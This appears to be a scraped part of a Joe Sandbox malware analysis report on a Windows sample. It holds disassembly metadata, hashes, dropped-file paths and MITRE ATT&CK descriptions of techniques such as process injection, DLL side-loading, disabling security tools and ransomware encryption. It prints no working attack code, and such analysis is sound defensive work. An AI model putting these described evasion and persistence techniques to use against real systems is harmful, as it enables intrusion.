realloc.MSVCRT ref: 00007FF6E3A77133
memcpy.MSVCRT ref: 00007FF6E3A7715E

Strings

false, xrefs: 00007FF6E3A77146
true, xrefs: 00007FF6E3A7714D

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: memcpyrealloc
String ID: false$true
API String ID: 2500458235-2658103896
Opcode ID: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
Instruction ID: 3384f904c1888d6774cb34d4cee90b93cdcd6abd650d870a3b33c998015895be
Opcode Fuzzy Hash: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
Instruction Fuzzy Hash: AB01D8E3F05A8642EB189B19E9953BD6B51AF447C0F448431CA5C57696EE2DD4C18305

Function 00007FF6E3A64D00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6E3A68C00: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF6E3A64D18,?,?,?,00007FF6E3A62E71,?,?,00007FF6E3B8CC48,00000000,00007FF6E3A61609), ref: 00007FF6E3A68C11

FlsGetValue.KERNEL32(?,?,?,00007FF6E3A62E71,?,?,00007FF6E3B8CC48,00000000,00007FF6E3A61609,?,?,?,?,00007FF6E3A61315), ref: 00007FF6E3A64D22

Part of subcall function 00007FF6E3A680D0: calloc.MSVCRT ref: 00007FF6E3A680DD
Part of subcall function 00007FF6E3A680D0: memset.MSVCRT ref: 00007FF6E3A68106

Part of subcall function 00007FF6E3A68C90: FlsSetValue.KERNEL32(?,?,?,?,00007FF6E3A64E16), ref: 00007FF6E3A68C94

Strings

cannot allocate __cxa_eh_globals, xrefs: 00007FF6E3A64D6D
execute once failure in __cxa_get_globals_fast(), xrefs: 00007FF6E3A64D61
std::__libcpp_tls_set failure in __cxa_get_globals(), xrefs: 00007FF6E3A64D79

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: OnceValue$ExecuteInitcallocmemset
String ID: cannot allocate __cxa_eh_globals$execute once failure in __cxa_get_globals_fast()$std::__libcpp_tls_set failure in __cxa_get_globals()
API String ID: 2044551959-1509371760
Opcode ID: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
Instruction ID: b18a2819d8dd214c79bd0270eecbb3ce3569fd339beeea06a789876b6e904ba3
Opcode Fuzzy Hash: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
Instruction Fuzzy Hash: 46014F22F3960781FB54A71DA8573B43A845F90380F410939D90DE62E3FE2FB8D1830A

Function 00007FF6E3A68920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6E3A68944
fflush.MSVCRT ref: 00007FF6E3A68986

Strings

LIBUNWIND_PRINT_APIS, xrefs: 00007FF6E3A6893D
libunwind: __unw_resume(cursor=%p), xrefs: 00007FF6E3A6896A

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_resume(cursor=%p)
API String ID: 1137233558-227906034
Opcode ID: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
Instruction ID: e2f168253bf180122d0dc237ff5f9e3527f5de8d600965d1fab17c52087c5847
Opcode Fuzzy Hash: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
Instruction Fuzzy Hash: D1011E13F1A69741FB14571EB81A3783E985F66B80F054436C94EB33A1DD1E6586830B

Function 00007FF6E3A82CD0 Relevance: 6.4, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF6E3A82D71
LeaveCriticalSection.KERNEL32 ref: 00007FF6E3A82DAA
free.MSVCRT ref: 00007FF6E3A82E1D
LeaveCriticalSection.KERNEL32 ref: 00007FF6E3A82E46

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: CriticalLeaveSection$free
String ID:
API String ID: 2017658852-0
Opcode ID: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
Instruction ID: 494b866244919c33685a64f1a182bdf59909f9b0cccfbca76320643a01bf0d1f
Opcode Fuzzy Hash: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
Instruction Fuzzy Hash: EE518D23B0968780FB54AF09A95A3757FA2AF59784F080435C94EA7790DE3EE4C0C34A

Function 00007FF6E3A664F0 Relevance: 6.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6E3A665A4

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
Instruction ID: 3ee7316f26603853003cb309757d0b0eafe53b4275d802af6fa64fc695da9763
Opcode Fuzzy Hash: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
Instruction Fuzzy Hash: 5F91F8B7B2424287E7388E1EE1527797B91EB14794F018135CB5AD3BA0DE3EF4808B05

Function 00007FF6E3A79D00 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A79D3C
realloc.MSVCRT ref: 00007FF6E3A79DC0
realloc.MSVCRT ref: 00007FF6E3A79E10
realloc.MSVCRT ref: 00007FF6E3A79E94

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
Instruction ID: 822315a8a4e12097bc08b2ea2ecff5b12f26bf6afd2cd9a30ae1a251d8d6388e
Opcode Fuzzy Hash: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
Instruction Fuzzy Hash: 34518DB3A06B8682DF258F5AE444269B761FB58BC4F048132CB8E537A4DF3DE091C305

Function 00007FF6E3A82060 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00007FF6E3A82086
fputc.MSVCRT ref: 00007FF6E3A82150

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fputclocaleconv
String ID:
API String ID: 697933784-0
Opcode ID: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
Instruction ID: 4c3e860da28b129567ebe8463689e3d50db76f06b7044e1fbb2f97748d8e0bc2
Opcode Fuzzy Hash: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
Instruction Fuzzy Hash: 43417573F04181C6F3349A6AE58A37E7AA2EB14754F200135DB6E92BC1CE2DE5C28755

Function 00007FF6E3A794E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A79520
realloc.MSVCRT ref: 00007FF6E3A795B3

Strings

&, xrefs: 00007FF6E3A79545

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: &
API String ID: 471065373-1010288
Opcode ID: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
Instruction ID: 91ae5ab78d5d3cc9d523ee87ce4dd12dd7c39f4b5fc2a5476e92fc4d34410d81
Opcode Fuzzy Hash: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
Instruction Fuzzy Hash: 9F3192B3609B8582DB25CF29F4802ADBBA1E758BC8F048226DB8D57799DF3DD545C301

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sE5IdDeTp2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hpv55ni.elg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vzha0zp.knk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1au5v25x.zij.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_232uoc2g.0fp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2a4o3nhh.hgs.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33xqug3k.g4g.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pybed0l.awq.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vrr3bta.pac.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4elj2xmu.dqy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vksjxdp.15x.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ni5n5ky.l5u.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ap2oft40.i0v.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b30hmtqg.dcl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bg2qandh.mth.psm1

Windows Analysis Report
sE5IdDeTp2.exe